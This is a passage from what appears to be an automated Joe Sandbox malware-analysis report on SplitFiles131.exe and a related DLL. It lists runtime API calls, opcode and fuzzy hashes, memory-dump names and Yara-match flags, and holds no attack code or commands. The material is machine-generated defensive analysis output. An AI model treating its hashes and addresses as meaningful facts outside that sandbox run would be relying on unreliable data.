                                          • Instruction Fuzzy Hash: 9F21DE39E01220F7D73147679C44A9B3769AF05BA4F550136ED06A7390E638ED41C6DD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: api-ms-$ext-ms-
                                          • API String ID: 0-537541572
                                          • Opcode ID: 495c40b57803ef5ef3fb5807e2b2eab896702d7168f31e2b001653fa3d16e092
                                          • Instruction ID: 90a9feae873bb1b7bb8f48b179cd5688537d64e801fb6ee6e67ba8e33ea3485b
                                          • Opcode Fuzzy Hash: 495c40b57803ef5ef3fb5807e2b2eab896702d7168f31e2b001653fa3d16e092
                                          • Instruction Fuzzy Hash: BD219675A01221ABF7A2CB248D84A4A3698FB057E0F224655FDC5A7295DB70EE0487E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 133ea2b89444c130765e51dc6ef272bab715d3be83394f254edc6edf343bbe22
                                          • Instruction ID: 18b0f10dc80f86e3b47954cd7ac735c8865c2d37fda3f0ccca68a77a81fef9d4
                                          • Opcode Fuzzy Hash: 133ea2b89444c130765e51dc6ef272bab715d3be83394f254edc6edf343bbe22
                                          • Instruction Fuzzy Hash: 3F116D31540B04FAFE20FFB2CC07FCB77AC5F05B06F40491EB29966066DA6EEA445699
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00425D5D: _free.LIBCMT ref: 00425D82
                                          • _free.LIBCMT ref: 0042605F
                                            • Part of subcall function 0041E2B8: HeapFree.KERNEL32(00000000,00000000,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?), ref: 0041E2CE
                                            • Part of subcall function 0041E2B8: GetLastError.KERNEL32(?,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?,?), ref: 0041E2E0
                                          • _free.LIBCMT ref: 0042606A
                                          • _free.LIBCMT ref: 00426075
                                          • _free.LIBCMT ref: 004260C9
                                          • _free.LIBCMT ref: 004260D4
                                          • _free.LIBCMT ref: 004260DF
                                          • _free.LIBCMT ref: 004260EA
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 0ec00478f14c113bf47a4fee4d442575f16bafd0bb01c80a52db30f625d4e359
                                          • Instruction ID: b3dbb492fdefcd87f13974c7623e4ee0a28cf06b85d3f0612ad809807c760fc1
                                          • Opcode Fuzzy Hash: 0ec00478f14c113bf47a4fee4d442575f16bafd0bb01c80a52db30f625d4e359
                                          • Instruction Fuzzy Hash: 5C11B431640B14AAD520B7B2DC0BFCBBB9C5F01344F808D1FF69D660A2EA7CB6408769
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 1000BB04: _free.LIBCMT ref: 1000BB29
                                          • _free.LIBCMT ref: 1000BB8A
                                            • Part of subcall function 10008701: RtlFreeHeap.NTDLL(00000000,00000000,?,100074AC), ref: 10008717
                                            • Part of subcall function 10008701: GetLastError.KERNEL32(?,?,100074AC), ref: 10008729
                                          • _free.LIBCMT ref: 1000BB95
                                          • _free.LIBCMT ref: 1000BBA0
                                          • _free.LIBCMT ref: 1000BBF4
                                          • _free.LIBCMT ref: 1000BBFF
                                          • _free.LIBCMT ref: 1000BC0A
                                          • _free.LIBCMT ref: 1000BC15
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: a7358a4db6e1da6d63c69c07c6b5017a17c7ec25ee6c44925f82e9684ad80130
                                          • Instruction ID: 50d7879656c57a25cf13df4160670f294727ae21723d392f61a5f7ff99cca00a
                                          • Opcode Fuzzy Hash: a7358a4db6e1da6d63c69c07c6b5017a17c7ec25ee6c44925f82e9684ad80130
                                          • Instruction Fuzzy Hash: D2112C75550B04EAEA20FBB0CC46FDB77ADEF00780F900815B2ADA616EDBA5B504CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 004043EF
                                            • Part of subcall function 0041044B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,0040E035,?,0043B72C,?), ref: 004104AB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionRaise___std_exception_copy
                                          • String ID: `=@$`=@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                          • API String ID: 3109751735-2436082744
                                          • Opcode ID: 2276f604c3605784d6e405f8d7a2a755b298f9d58d573019e86a6d79aba38d61
                                          • Instruction ID: 5758688b685aa4187ad7d7f5b15dace94247948c6bb2fc7bee6470d4da2af1b6
                                          • Opcode Fuzzy Hash: 2276f604c3605784d6e405f8d7a2a755b298f9d58d573019e86a6d79aba38d61
                                          • Instruction Fuzzy Hash: FB11E4B16003045BC714DF59D802B96B3E8AF84310F10D53FFA55ABA81E778E854CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 00420803
                                          • __fassign.LIBCMT ref: 004209E8
                                          • __fassign.LIBCMT ref: 00420A05
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00420A4D
                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00420A8D
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00420B35
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                          • String ID:
                                          • API String ID: 1735259414-0
                                          • Opcode ID: 45f1c1bc1b9525421630f80e21f96edc239ce45b7ad5b4f0668f9778ebca938e
                                          • Instruction ID: 5bda8817d63fbd95ec10d1615f909a3fa13ea14378ce0ba8d39ea156ef37e8f3
                                          • Opcode Fuzzy Hash: 45f1c1bc1b9525421630f80e21f96edc239ce45b7ad5b4f0668f9778ebca938e
                                          • Instruction Fuzzy Hash: 59C18E75E002688FCB14CFA9D9809EDFBF5AF18304F68416AE855B7342D635A942CF68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000C11C
                                          • __fassign.LIBCMT ref: 1000C301
                                          • __fassign.LIBCMT ref: 1000C31E
                                          • WriteFile.KERNEL32(?,10008E0A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000C366
                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000C3A6
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000C44E
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                          • String ID:
                                          • API String ID: 1735259414-0
                                          • Opcode ID: 98efbe4c6ee7657adc3feaa6b2c886c835ef08a3cb57c6140dfa4e34a11008b6
                                          • Instruction ID: d8b638840345e1b49b0cc72bb3c582407c8398851cd7aadc47a9f3c0936b2730
                                          • Opcode Fuzzy Hash: 98efbe4c6ee7657adc3feaa6b2c886c835ef08a3cb57c6140dfa4e34a11008b6
                                          • Instruction Fuzzy Hash: E4C19E75D0025C9FEB11CFE8C8909EDBBB5FF08354F28816AE855B7246D631AE06CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _strrchr
                                          • String ID: UHA
                                          • API String ID: 3213747228-2890760514
                                          • Opcode ID: ea010ae931ad1b145e5fd3dfd9d8e6290a85c3b5d9bd79e2341eb9072933dd63
                                          • Instruction ID: 45e9e1605b069a012dfbc5f54e827baf5efa537bc91593008a961953a6f8b556
                                          • Opcode Fuzzy Hash: ea010ae931ad1b145e5fd3dfd9d8e6290a85c3b5d9bd79e2341eb9072933dd63
                                          • Instruction Fuzzy Hash: 01B13671A002559FDB11CF68C881BEFBBA5EF55344F2541BBE854AB342D2388D8BC768
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(?,?,00411D9B,0041019F,0040F7D9), ref: 00411DB2
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00411DC0
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00411DD9
                                          • SetLastError.KERNEL32(00000000,00411D9B,0041019F,0040F7D9), ref: 00411E2B
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 45bd82ce1dbd3c8e72b1b680d8146cb8cc17257a2e8ce5ccc350ce85e15801c5
                                          • Instruction ID: 538d6b09e676f6115927efde8c1f2b3b6cae1e07978b049f78eb883490b1d345
                                          • Opcode Fuzzy Hash: 45bd82ce1dbd3c8e72b1b680d8146cb8cc17257a2e8ce5ccc350ce85e15801c5
                                          • Instruction Fuzzy Hash: 3C01F7327093216EA7292BB67C85AE72B94FB05B7AB20033FF610852F1EF595C93514C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(00000001,?,100046F1,100038AA,100032A7,?,100034DF,?,00000001,?,?,00000001,?,10015758,0000000C,100035D8), ref: 100048F8
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10004906
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000491F
                                          • SetLastError.KERNEL32(00000000,100034DF,?,00000001,?,?,00000001,?,10015758,0000000C,100035D8,?,00000001,?), ref: 10004971
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 7a07fe8dd6e183f70e1ed33fe8cb46bc5f72bd9116114fb4a898372d9b8b1887
                                          • Instruction ID: aa6f2bb6e0f81693f4a69917c870ce6a712f51b8e9c958d3c9a19b96842cdbe6
                                          • Opcode Fuzzy Hash: 7a07fe8dd6e183f70e1ed33fe8cb46bc5f72bd9116114fb4a898372d9b8b1887
                                          • Instruction Fuzzy Hash: 5D01287760D322AEF211C7746CC960B26A5FB096F57224339F514511F9EF619C019248
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free_strpbrk
                                          • String ID: *?
                                          • API String ID: 3300345361-2564092906
                                          • Opcode ID: a050ba51c68dd2f6a83959d6b4595b7304e937643ef59868ca146369180ad406
                                          • Instruction ID: a5b53929445bb92843a6d04ab522df775d1d9dfa49c27ddf940b2185fd00e526
                                          • Opcode Fuzzy Hash: a050ba51c68dd2f6a83959d6b4595b7304e937643ef59868ca146369180ad406
                                          • Instruction Fuzzy Hash: D9616E76E002299FCB14CFA9D8815EEFBF5EF48714F6441AAE815F7300D639AE418B94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • C:\Program Files (x86)\Split Files\SplitFiles131.exe, xrefs: 10009A2F
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Program Files (x86)\Split Files\SplitFiles131.exe
                                          • API String ID: 0-4111602209
                                          • Opcode ID: e9296d43ca75f7937d2bfdf5c651374163314c5b883c374609abe0d00f2d06f1
                                          • Instruction ID: f719ca89bfa5e63d0542726edbeff2ced601996c164ddfce3f4ce27f4cb91101
                                          • Opcode Fuzzy Hash: e9296d43ca75f7937d2bfdf5c651374163314c5b883c374609abe0d00f2d06f1
                                          • Instruction Fuzzy Hash: 1A21F07170421AAFFB10DF619C80D1B77ADEF062E4B218624F924D7198EB70EC0087E2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00413038,?,?,00450598,00000000,?,00413163,00000004,InitializeCriticalSectionEx,0042FC40,InitializeCriticalSectionEx,00000000), ref: 00413007
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID: api-ms-
                                          • API String ID: 3664257935-2084034818
                                          • Opcode ID: 1a234b940769df153807f2f8457fd7efa6b9557a3f6a313264f62211ba6c1823
                                          • Instruction ID: 324e9a28238f0b2d2c387c29989b4e23a6be0dab15a3266a9455cfbf25704082
                                          • Opcode Fuzzy Hash: 1a234b940769df153807f2f8457fd7efa6b9557a3f6a313264f62211ba6c1823
                                          • Instruction Fuzzy Hash: 3911A332B41221ABDB325B689D44B9E77B4AF01760F550232F901E7380D7B8ED92A6DD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FreeLibrary.KERNEL32(00000000,?,?,10005A13,00000000,?,00000001,00000000,?,10005A8A,00000001,FlsFree,10010CAC,FlsFree,00000000), ref: 100059E2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID: api-ms-
                                          • API String ID: 3664257935-2084034818
                                          • Opcode ID: 05dae4829f89c238065b3f81865d8903e6a2693040ccf54503ed27d823b8eae0
                                          • Instruction ID: d85896a24450fc99b6d677e93262eca8bfdbf032966a5c4c6ca1d277b34163f7
                                          • Opcode Fuzzy Hash: 05dae4829f89c238065b3f81865d8903e6a2693040ccf54503ed27d823b8eae0
                                          • Instruction Fuzzy Hash: 88115431A41625E7FB12CB588C45B4A37E4EF057F1F224251F954AB188D7B1ED0086D5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00417BE6,0041CC1F,?,00417BAE,00000000,?,0041CC1F), ref: 00417C06
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00417C19
                                          • FreeLibrary.KERNEL32(00000000,?,?,00417BE6,0041CC1F,?,00417BAE,00000000,?,0041CC1F), ref: 00417C3C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: 45b6e53430105db54ba727b51daa37ece34f640119c748234f3aa513a62590f8
                                          • Instruction ID: 50fc213c28fa4c0962e30c3ca3a17305303cd13cd11f285dc03a73bb53cf4c5d
                                          • Opcode Fuzzy Hash: 45b6e53430105db54ba727b51daa37ece34f640119c748234f3aa513a62590f8
                                          • Instruction Fuzzy Hash: E6F08C30644219FBDB219B51DE0ABDEBB79EF00752F5040A1E401A22A0DBB88E02DBD8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10006D18,10007C68,?,10006CE0,10002482,?,10007C68), ref: 10006D7B
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10006D8E
                                          • FreeLibrary.KERNEL32(00000000,?,?,10006D18,10007C68,?,10006CE0,10002482,?,10007C68), ref: 10006DB1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: db8878897a761d3f804d4e4fac8edfdfd5bd9024b52660bc89352341890e853e
                                          • Instruction ID: d2a57dd25697f495839985113eab26af44f550b47abe90b3ea9ba5ee1bafc218
                                          • Opcode Fuzzy Hash: db8878897a761d3f804d4e4fac8edfdfd5bd9024b52660bc89352341890e853e
                                          • Instruction Fuzzy Hash: B3F0A730B01228FBFB02DB90CD09BDD7ABAEF08396F104064F881A2164CBB4CE00DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCPInfo.KERNEL32(00000000,00000001,DCBD048B,7FFFFFFF,?,?,0042A7C6,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0042A5AD
                                          • __alloca_probe_16.LIBCMT ref: 0042A663
                                          • __alloca_probe_16.LIBCMT ref: 0042A6F9
                                          • __freea.LIBCMT ref: 0042A764
                                          • __freea.LIBCMT ref: 0042A770
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __alloca_probe_16__freea$Info
                                          • String ID:
                                          • API String ID: 2330168043-0
                                          • Opcode ID: a5fe50a03750e12b804546607bf942e621f4ed7c490ae8aaad7ccc39bb9a9842
                                          • Instruction ID: f4f69ad519bf12574fe1d3cc16ac7f29689b845bc3e354e2090f1d74cfa97f91
                                          • Opcode Fuzzy Hash: a5fe50a03750e12b804546607bf942e621f4ed7c490ae8aaad7ccc39bb9a9842
                                          • Instruction Fuzzy Hash: A981B372E002256BDF209E55AD41AEF7BB59F49714F98005BEC40A7241D73DCC61CBAE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCPInfo.KERNEL32(00000000,00000001,0000000C,7FFFFFFF,?,?,1000B74B,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 1000B532
                                          • __alloca_probe_16.LIBCMT ref: 1000B5E8
                                          • __alloca_probe_16.LIBCMT ref: 1000B67E
                                          • __freea.LIBCMT ref: 1000B6E9
                                          • __freea.LIBCMT ref: 1000B6F5
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: __alloca_probe_16__freea$Info
                                          • String ID:
                                          • API String ID: 2330168043-0
                                          • Opcode ID: c6390f5830a5bd64e0d7d9921fe9131eca71760e160ba7ebcfd4c686c01d4e7a
                                          • Instruction ID: 51b2610d37baa8f47a16c6f8ed064628e0d76a618a69041087d5fbf597a7fe1f
                                          • Opcode Fuzzy Hash: c6390f5830a5bd64e0d7d9921fe9131eca71760e160ba7ebcfd4c686c01d4e7a
                                          • Instruction Fuzzy Hash: 7481B072E00A1A9BFF10DE658C81AEE7BF9DF493D4F150159E804B7249D636DD40CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __alloca_probe_16.LIBCMT ref: 1000D178
                                          • __alloca_probe_16.LIBCMT ref: 1000D23E
                                          • __freea.LIBCMT ref: 1000D2AA
                                            • Part of subcall function 1000873B: RtlAllocateHeap.NTDLL(00000000,?,?,?,10003243,?,?,100024B8,0007A120), ref: 1000876D
                                          • __freea.LIBCMT ref: 1000D2B3
                                          • __freea.LIBCMT ref: 1000D2D6
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd
                                          Similarity
                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                          • String ID:
                                          • API String ID: 1423051803-0
                                          • Opcode ID: 146f262ff555a53674fd139b17de7a2300d41466104e78fb213c224316c85ad6
                                          • Instruction ID: 8e48ba519724a98946e6f1a20e563b472711a73b32590d39ac94bb068a9bb579
                                          • Opcode Fuzzy Hash: 146f262ff555a53674fd139b17de7a2300d41466104e78fb213c224316c85ad6
                                          • Instruction Fuzzy Hash: DC51B172600216ABFB11EE54CC81EAF37A9EF957E0F12012AFD04A7148EB70ED5196B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041ED2F: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040FF9B,?,?,?,?,?,00403757,?,?,?), ref: 0041ED61
                                          • _free.LIBCMT ref: 0041BB80
                                          • _free.LIBCMT ref: 0041BB97
                                          • _free.LIBCMT ref: 0041BBB4
                                          • _free.LIBCMT ref: 0041BBCF
                                          • _free.LIBCMT ref: 0041BBE6
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$AllocateHeap
                                          • String ID:
                                          • API String ID: 3033488037-0
                                          • Opcode ID: 2ac9717b4801cc9c3e4fb2398baf62dd1adc69d55e91d29d558fb5eaeb849720
